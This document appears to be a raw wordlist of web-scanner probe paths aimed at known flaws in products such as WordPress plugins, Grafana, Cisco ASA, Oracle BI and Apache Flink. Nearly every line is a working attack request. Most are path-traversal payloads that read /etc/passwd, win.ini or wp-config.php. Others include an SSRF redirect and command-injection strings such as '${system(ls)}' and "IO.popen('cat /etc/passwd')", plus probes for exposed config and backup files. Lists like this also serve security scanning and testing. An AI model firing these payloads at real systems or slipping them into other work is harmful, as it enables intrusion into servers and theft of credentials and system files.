/ReportServer/Pages/ReportViewer.aspx
/MicroStrategyWS/happyaxis.jsp
/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/var/www/html/wordpress/wp-content/index.php
/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/var/www/html/wp-content/index.php
/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php
/ucmdb-api/connect
/v2/api/product/manger/getInfo
/cgi-bin/ExportAllSettings.sh
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/files/ldap.debug.txt
/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1
/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1
/wp-json/acf/v3/options/a?id=active&field=plugins
/analytics/saw.dll?bieehome&startPage=1
/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd
/../../../../../../../../../../../../windows/win.ini
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text
/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
/wp-content/uploads/wp-file-manager-pro/fm_backup/
/../../../../../../../../windows/win.ini
/infusions/downloads/downloads.php?cat_id=${system(ls)}
/config/getuser?index=0
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
/SearchSvc/CVSearchService.svc
/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd
/wp-json/wp/v2/lesson/1
/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1
/pme/media/
/index.php?download=/etc/passwd
/api/settings/values
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/wp-content/plugins/easy-wp-smtp/
/wp-content/plugins/wp-mail-smtp-pro/
/searchblox/servlet/FileServlet?col=9&url=/etc/passwd
/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/wp-admin/index.php?download-lp-users=yes
/os/mxperson
/meaweb/os/mxperson
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development
/metrics/v1/mbeans
?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
/index.php?page_slug=../../../../../etc/passwd%00
/css/eonweb.css
/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri
/version.web
/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2
/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4
/getcfg.php
/settings.php
/graphql
/index.jsp
